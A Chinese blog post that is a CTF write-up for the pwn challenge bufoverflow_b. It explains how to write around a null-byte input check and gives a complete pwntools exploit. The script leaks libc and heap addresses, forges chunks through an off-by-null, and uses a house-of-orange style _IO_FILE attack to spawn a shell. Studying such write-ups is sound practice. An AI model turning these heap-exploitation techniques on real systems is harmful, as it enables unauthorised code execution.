攻防世界PWN之bufoverflow_b题解

最新推荐文章于 2023-07-07 19:35:30 发布
最新推荐文章于 2023-07-07 19:35:30 发布
阅读量774 收藏
点赞数 1
分类专栏: pwn CTF 二进制漏洞 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104391405
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

bufoverflow_b

这题和bufferoverflow_a类似,只是在输入的时候,增加了一个检查

遇到空字符就会截断,这将不利于我们在chunk里伪造数据。

另外增加了一个功能,不过我没有使用到。

遇到’\x00’就会截断,但是我们仍然可以完整的把我们的伪造数据放进去。

比如,我们要在偏移0x30处写一个数据0x0000000000123456,我们先把0x30处的8字节数据清零,我们可以这样,第一次payload = ‘a’*0x37 + ‘\x00’,第二次payload = ‘a’*0x36 + ‘\x00’,第三次payload = ‘a’*0x35 + ‘\x00’这样循环8次,即可以把0x30处的8字节数据清零。然后,我们就可以写数据了。payload = ‘a’*0x30 + ‘\x56\x34\x12\x00’。需要注意的时,我们需要照着原来buffoverflow_apayload,倒过来从最后一个数据开始部署。这样,我们才能不把已经部署的给覆盖掉。

直接上exp脚本

#coding:utf8
from pwn import *

sh = process('./bufoverflow_b')
#sh = remote('111.198.29.45',49457)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
#libc = ELF('./libc.so.6')
_IO_list_all_s = libc.symbols['_IO_list_all']
malloc_hook_s =  libc.symbols['__malloc_hook']
system_s = libc.sym['system']
binsh_s = libc.search('/bin/sh').next()

def create(size):
   sh.sendlineafter('>>','1')
   sh.sendlineafter('Size:',str(size))

def delete(index):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('Index:',str(index))

def fill(content):
   sh.sendlineafter('>>','3')
   sh.sendafter('Content:',content)

def show():
   sh.sendlineafter('>>','4')
#清零offset处开始8字节的空间
def clean(offset):
   for i in range(7,-1,-1):
      fill('b'*(offset + i) + '\x00')

def get_IO_str_jumps():
   IO_file_jumps_offset = libc.sym['_IO_file_jumps']
   IO_str_underflow_offset = libc.sym['_IO_str_underflow']
   for ref_offset in libc.search(p64(IO_str_underflow_offset)):
       possible_IO_str_jumps_offset = ref_offset - 0x20
       if possible_IO_str_jumps_offset > IO_file_jumps_offset:
          print possible_IO_str_jumps_offset
          return possible_IO_str_jumps_offset
#==============泄露libc相关地址============
#0
create(0x80)
#1
create(0x80)
delete(0)
delete(1)
#0申请回来,此时保留了libc指针
create(0x80)
show()
sh.recv(1)
#泄露信息
main_arena_xx = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) +  (malloc_hook_s & 0XFFF)
libc_base = malloc_hook_addr - malloc_hook_s
_IO_list_all_addr = libc_base + _IO_list_all_s
_IO_str_jumps_addr = libc_base + get_IO_str_jumps()
system_addr = libc_base + system_s
binsh_addr = libc_base + binsh_s
print 'libc_base=',hex(libc_base)
print '_IO_list_all_addr=',hex(_IO_list_all_addr)
print 'system_addr=',hex(system_addr)
#===========泄露堆地址====================
#1
create(0x400) #large bin范围的堆释放后会有堆地址
create(0x80) #2
#将1放入unsorted bin
delete(1)
#触发整理unsorted bin,将1放入large bin,从而1里堆有指针
create(0x500) #1
delete(1)
#释放堆2,由于堆2下面是top块,堆2上面的堆1也是free状态,那么就和全部合并到top块里,但里面的指针信息仍然有保留。
delete(2)
#此时,堆0下面的堆1是top块,释放0后,堆0也合并到了top块里
delete(0)
#所有bin都合并了,只剩下一个top块
#错位0x10,使得接下来1的fd位置正好有堆指针
create(0x90) #0
create(0x80) #1
show()
sh.recv(1)
heap_base = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00')) - 0xB0
print 'heap_base=',hex(heap_base)
#============================================
delete(0)
delete(1)
#0
create(0x208)
'''fake_chunk = 'a'*0x20
fake_chunk += p64(0) + p64(0x1E1)
#让fd=bk=p绕过检查
fake_chunk += p64(heap_base + 0x50)*2
fake_chunk = fake_chunk.ljust(0x200,'a')
fake_chunk += p64(0x1E0)'''
#由于限制,我们倒着部署fake_chunk
clean(0x200)
fake_chunk = 'a'*0x200 + '\xE0\x01\x00'
fill(fake_chunk)
clean(0x38)
fake_chunk = 'a'*0x38 + p64(heap_base + 0x50)[0:7]
fill(fake_chunk)
clean(0x30)
fake_chunk = 'a'*0x30 + p64(heap_base + 0x50)[0:7]
fill(fake_chunk)
clean(0x28)
fake_chunk = 'a'*0x28 + '\xE0\x01\x00'
fill(fake_chunk)
#1
create(0x80)
#2注意,2必须为0xF0,这样实际为0x100,off by null one后大小仍为0x100,与top chunk相邻,才能合并到top chunk
#因此不能在2末尾伪造fake_chunk
create(0xF0)
fill('b'*0xF0)

delete(1)
#1
create(0x88)
#fill('b'*0x80 + p64(0x270))
fill('b'*0x88) #off by one
clean(0x80)
fill('b'*0x80 + '\x70\x02\x00')
#合并
delete(2)
####注意
create(0x290)
#重新复原1、2堆的头信息
#fill('a'*0x1D0 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x101) + '\n')
clean(0x268)
fill('a'*0x268 + '\x01\x01\x00')
clean(0x1D8)
fill('a'*0x1D8 + '\x91\x00')
#为了delete后我们的内容不被清空或填充,
#我们需要把chunk1也给剔除,这样我们后面申请的时候,才不会被mallocopt设置free后的填充物
#注意顺序!!!
delete(1)
delete(0)

create(0x290) #0
#在fake_chunk里腾出位置伪造填充块,而这个chunk0末尾也要放一个填充块绕过检查
#也就是总共要伪造三个chunk,总大小要等于这个chunk0的大小,即0x290
#fill('a'*0x20 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x151) + '\n')
clean(0xB8)
fill('a'*0xB8 + '\x51\x01\x00')
clean(0x28)
fill('a'*0x28 + '\x91\x00')
delete(0) #得到外层unsorted bin
delete(2) #得到内层unsorted bin
create(0x290)

#现在,我们已经可以控制unsorted bin了
payload = 'a'*0x20
#house of orange in 2.24
'''fake_file = p64(0) + p64(0x60)
#unsorted bin attack,修改_IO_list_all为main_arena+88
fake_file += p64(0) + p64(_IO_list_all_addr-0x10)
#_IO_write_base < _IO_write_ptr
fake_file += p64(0) + p64(1)
#_IO_write_end 、IO_buf_base
fake_file += p64(0) + p64(binsh_addr)
fake_file = fake_file.ljust(0xD8,'\x00')
#vtable指针,同时,也作为fake_vtable的__dummy
fake_file += p64(_IO_str_jumps_addr - 8)
#__dummy2、__finish
fake_file += p64(0) + p64(system_addr)'''

start = 0x20
clean(start + 0xE8)
fill(payload + 'a'*0xE8 + p64(system_addr)[0:7])
clean(start + 0xE0)
clean(start + 0xD8)
fill(payload + 'a'*0xD8 + p64(_IO_str_jumps_addr - 8)[0:7])
for i in range(0xD0,0x38,-8):
   #print hex(i)
   clean(start + i)
clean(start + 0x38)
fill(payload + 'a'*0x38 + p64(binsh_addr)[0:7])
clean(start + 0x30)
clean(start + 0x28)
fill(payload + 'a'*0x28 + '\x01\x00')
clean(start + 0x20)
clean(start + 0x18)
fill(payload + 'a'*0x18 + p64(_IO_list_all_addr-0x10)[0:7])
clean(start + 0x10)
clean(start + 0x8)
fill(payload + 'a'*0x8 + p64(0x60)[0:2])
clean(start + 0)
#raw_input()
create(0x80)

sh.interactive()

 

ha1vk
关注
专栏目录
攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1599
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
攻防世界pwn题 -- secret file 题解
lifanxin的博客
12-24 907
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本 知识点关键字 栈溢出,popen函数,openssl sha256函数 样本 样本来自攻防世界pwn题 – secret file 运行 查看文件属性   所有保护全开 运行样本程序   本地运行会报一个错误即缺少一个libc动态链接库   该库是openssl开源库,用来实现一些加密算法的,这里给出libcrypto.so.1.1,报错的可以添加到自己本地,使用如下代码在本地/usr/lib下创建一个软链接就行。 ln -s libcrypt
攻防世界bufoverflow_b
weixin_43960998的博客
04-09 156
其他部分与 bufoverflow_a一样,但是 b 中多了一个检查: 这里不能输入空字节,这样的话就不能像 a 中直接布置,这样会破坏掉前面的字段,需要倒着布置。还有一个需要注意的就是,在触发 off by null 时 a 中可以一次性的布置好 pre_size 和 pre_inuse 位,但是在本题中则需要先覆盖 next chunk 的 pre_inuse 位,然后再清理填充的字节,布置 pre_size 位,再触发: # pad = '1'*0x80 + p64(0x270) add(0x88)
攻防世界 pwn 进阶 bufoverflow_b
yongbaoii的博客
03-13 242
bufoverflow_b差不多,就是多了个检查。 所以先看看bufoverflow_a 说跟bufoverflow_a差不多是为啥,因为它就是在输入的时候检查多了一项。 这个是bufoverflow_a 这个是bufoverflow_b 这个题会检查我们的输入是不是\x00,意思是会被\x00截断,那么我们在输入数据的时候就会麻烦一些。 那我们怎么去解决这个烦恼,我们这里利用大佬的方法。 在我们向内存中写地址的时候内存中一定会有一些垃圾数据,我们写数据的时候,假如我们要写入一个地址,在内存中小端序
攻防世界bufoverflow_a
weixin_43960998的博客
04-09 272
1.程序逆向 简单的逆向,记一下几个地方:当chunk数大于2时,便使用 calloc 分配并且 free 后会进行填充: 关于 mallopt 见这里。 漏洞出现在 fill 功能中,存在 off by null。 show 输出遇 0 截断。 2.漏洞利用&限制条件 off by null chunk size 无限制 可以泄漏地址 chunk 只有两个 show 遇 ‘\x00’ 截断 可以无限次 edit     由于能够正常 malloc
攻防世界 pwn 进阶 bufoverflow_a
yongbaoii的博客
03-13 439
保护一片绿。 菜单堆。 alloc delete fill show
hackme pwn toomuch1 - buffer overflow
ACdream
01-23 311
一开始看到这个漏洞还是蛮明显的~ 这里s的长度只有0x18个字节,然后用的是gets和strcpy来输入和传递,意味着没有长度限制与安全检查,所以可以直接缓冲区溢出来覆盖函数返回地址 返回地址在ebp + 4,这里是ebp - 18 中间的填充值也就好算了~和homework一样,这里有现成的函数重用 代码如下: #!/usr/bin/env python # coding=utf...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
攻防世界pwn-int_overflow
a_silly_coder的博客
05-14 282
下载文件后首先检查保护,发现不存在canary,可以进行栈溢出。 将文件拖入ida32位进行查看,发现是一个简单的登录。 首先在login()中输入账号和密码,发现passwd存在buf中,可输入长度有0x199,然后传入check_passwd()函数中。 然后在check_passwd中将0x199长度的buf复制给dest,但是dest距离ebp只有0x14,我们也在文件中发现了cat flag的函数,所以思路就很清晰了,在输入密码时,输入一个长字符串,在check_passwd函数..
2020-11-09学习记录:攻防世界pwn之echo_back
eeeeeight的博客
11-09 275
今天就算是世界毁灭,我也要更新博客,容我先睡一觉
hackme pwn toomuch2 [buffer overflow + ROPx86]
ACdream
01-27 363
checksec一下,发现啥保护也没有,不需要再找libc的版本了 这里的漏洞点在toomuch1中说过了 在toooomuch函数中,覆盖0x18+4个值,即可达到溢出效果 下一步目标是:将"/bin/sh"写入bss段中,然后执行system函数即可 类似x64平台,在x86中也有相似的通用gadgets exp1: 利用gets+system: #!/usr/bi...
攻防世界PWNbufoverflow_a题解(house of orange in 2.24&house of Einherjar)
seaaseesa的博客
02-19 977
bufoverflow_a 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,是一个经典的增删改查的程序,然后我们看到创建堆时,前两个堆是用malloc创建,后面的堆用calloc创建,这意味着,如果要泄露libc地址,只能靠前两个堆,后面的堆从bin里取出后会清空里面的信息。 Fill功能存在一个null off by one漏洞 我们每次只能对最后创建的那个堆进...
硬核二进制安全学习:Buffer Overflow(栈的缓冲区溢出&&Pwn技巧Return to Text)
「鸿渐之翼」的博客
01-09 1770
前言: 我喜欢讲本质的东西,也许用处不一定大,希望我的“硬核二进制学习”系列文章能给你带来一些启迪,二进制安全的路虽然艰苦,只想为你分享我程序生涯的点点滴滴。 我是CSDN博主鸿渐之翼,文章有许多不足之处,欢迎各位学者专家指正批评。 点赞????+收藏+关注 上期文章:添加链接描述 NTUSTISC Pwn basic 台湾科技大学 Buffer Overflow: ...
bufffer overflow
qq_43481350的博客
07-23 295
Introduction The reson for buffer overflow is we set too many data to an array of finite length. Attackers will utilize the feature,they may be construct a special string to assign values to arrays and construct specific address cover return address(EIP re
PWN入门(2)栈溢出基础
农夫果园好好喝的博客
06-29 832
PWN栈溢出基础。
[BUUCTF]PWN——picoctf_2018_buffer overflow 0
mcmuyanga的博客
03-09 449
picoctf_2018_buffer overflow 0 附件 步骤 例行检查,32位程序,开启了nx保护 提示要ssh链接 ssh连上后稍微尝试了一下,好像vuln这个程序能读出flag 32为ida载入测试文件 百度一下signal,得知11是(SIGSEGV),对存储的无效访问的信号。 15行的意思是设置了一个函数sigsegv_handler来处理当程序产生对存储的无效访问。 就是说当程序造成无效内存访问的时候,就会输出flag。 在往下看vuln函数 将src拷贝到dest中,
Buffer Overflow缓冲区溢出和保护措施
最新发布
TranSad的博客
07-07 3056
缓冲区溢出是指当数据写入某个缓冲区(buffer)时,,从而导致覆盖了相邻内存区域的情况。这种现象可能导致程序崩溃、数据损坏,甚至引发安全漏洞,允许攻击者利用这一漏洞执行恶意代码。比如这个代码中,在内存中,a中的元素和d其实是挨着的,如果给a赋值了超过了它当前容量的数据,那么就会覆盖d的内容,导致d的值混乱。
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 336
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
2021 长安杯 pwn baigei
yongbaoii的博客
09-27 371
菜单堆 问题就出在当我们输入size之后,size会留下来然后才判断符不符合要求。 所以直接可以堆溢出。 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" local = 0 if local: r = process('./main') else: r = remote("113.201.14.253",21111) libc=ELF('/ho.
攻防世界Pwn题:利用FSA漏洞执行cat_flag
在"攻防世界pwn题:forgot.doc"文档中,我们探讨了一个关于利用有限状态自动机(FSA)中的漏洞来实现电子邮件地址验证的挑战。福克斯设计了一个题目,其中包含了一个32位的可执行文件,具有canary和PIE保护机制关闭,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值